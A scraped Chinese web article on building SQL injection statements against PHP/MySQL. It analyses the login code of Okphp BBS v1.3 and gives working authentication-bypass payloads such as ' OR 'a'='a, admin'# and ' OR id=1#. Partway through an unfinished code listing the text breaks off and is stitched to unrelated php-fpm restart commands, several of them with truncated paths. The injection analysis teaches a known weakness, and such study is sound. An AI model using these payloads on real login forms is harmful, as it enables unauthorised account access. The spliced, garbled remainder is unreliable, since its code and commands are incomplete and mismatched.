php語言

php+mysql注射語句構造

來源:文萃谷 1.39W

語句構造好壞直接影響了編程的質量,下面是本站小編精心為大家整理的php+mysql注射語句構造,希望對大家有幫助,更多內容請關注應屆畢業生網!

php+mysql注射語句構造

  一.前言:

版本信息:Okphp BBS v1.3 開源版

下載地址:

由於PHP和MYSQL本身得原因,PHP+MYSQL的.注射要比asp困難,尤其是注射時語句的構造方面更是個難點,本文主要是借對Okphp BBS v1.3一些文件得簡單分析,來談談php+mysql注射語句構造方式,希望本文對你有點幫助。

聲明:文章所有提到的“漏洞”,都沒有經過測試,可能根本不存在,其實有沒有漏洞並不重要,重要的是分析思路和語句構造。

  二.“漏洞”分析:

n/注射導致繞過身份驗證漏洞:

代碼:

$conn=sql_connect($dbhost, $dbuser, $dbpswd, $dbname);

$password = md5($password);

$q = "select id,group_id from $user_table where username='$username' and password='$password'";

$res = sql_query($q,$conn);

$row = sql_fetch_row($res);

$q = "select id,group_id from $user_table where username='$username' and password='$password'"中

$username 和 $password 沒過濾, 很容易就繞過。

對於select * from $user_table where username='$username' and password='$password'這樣的語句改造的方法有:

構造1(利用邏輯運算):$username=' OR 'a'='a $password=' OR 'a'='a

相當於sql語句:

select * from $user_table where username='' OR 'a'='a' and password='' OR 'a'='a'

構造2(利用mysql裏的註釋語句# ,/* 把$password註釋掉):$username=admin'#(或admin'/*)

即:

select * from $user_table where username='admin'#' and password='$password'"

相當於:

select * from $user_table where username='admin'

在admin/中$q語句中的$password在查詢前進行了md5加密所以不可以用構造1中的語句繞過。這裏我們用構造2:

select id,group_id from $user_table where username='admin'#' and password='$password'"

相當於:

select id,group_id from $user_table where username='admin'

只要存在用户名為admin的就成立,如果不知道用户名,只知道對應的id,

我們就可以這樣構造:$username=' OR id=1#

相當於:

select id,group_id from $user_table where username='' OR id=1# and password='$password'(#後的被註釋掉)

我們接着往下看代碼:

if ($row[0]) {

// If not admin or super moderator

if ($username != "admin" && !eregi("(^|&)3($|&)",$row[1])) {

$login = 0;

}

else {

$login = 1;

}

}

// Fail to login---------------

if (!$login) {

write_log("Moderator login","0","password wrong");

echo "

  5.4中php-fpm 的重啟、終止操作命令:

查看php運行目錄命令:which php

/usr/bin/php

查看php-fpm進程數:

ps aux | grep -c php-fpm

查看運行內存

/usr/bin/php -i|grep mem

重啟php-fpm

/etc/init.d/php-fpm restart

在phpinfo()輸出內容可以看到php相關配置。

Loaded Configuration File /etc/

==============================

首先要找到配置文件,查看pid的配置路徑(不是安裝路徑),然後把下面對應的地方改掉才能正常執行。

[root@DO-SG-H1 ~]# ps aux | grep php-fpm

root 11799 0.0 0.0 103248 880 pts/0 S+ 13:51 0:00 grep --color php-fpm

root 11973 0.0 0.0 417748 964 ? Ss Jun01 0:20 php-fpm: master process (/etc/)

cat /etc/

看到

pid = /var/run/php-fpm/

php-fpm 啟動:

/usr/local/php/sbin/php-fpm

php-fpm 關閉:

kill -INT `cat /var/run/php-fpm/`

php-fpm 重啟:

kill -USR2 `cat /var/run/php-fpm/`

查看php-fpm進程數:

ps aux | grep -c php-fpm

=============================

[root@DO-SG-H1 ~]# find / -name 'php-fpm' -type d

/var/log/php-fpm

/var/run/php-fpm

用這個find命令查找出來的路徑是不對的

which php

/usr/bin/php

相關文章
攻擊方法注射語句構造php+mysql
攻擊方法注射語句構造php+mysql
Php中用PDO查詢Mysql來避免SQL注入風險的方法
Php中用PDO查詢Mysql來避免SQL注入風險的方法
PHP中MySQL、MySQLi和PDO的用法和區別
PHP中MySQL、MySQLi和PDO的用法和區別
php與php MySQL之間的關係
php與php MySQL之間的關係
PHP開發:php與mysql三日通
PHP開發:php與mysql三日通
10條PHP中用到的mysql語句
10條PHP中用到的mysql語句
MySQLPHP語法
MySQLPHP語法
Linux+Apache+Mysql+PHP優化技巧
Linux+Apache+Mysql+PHP優化技巧
WinXP如何安裝Apache+MySQL+PHP環境
WinXP如何安裝Apache+MySQL+PHP環境
在PHP中操作MySQL要注意哪些問題
在PHP中操作MySQL要注意哪些問題
熱門標籤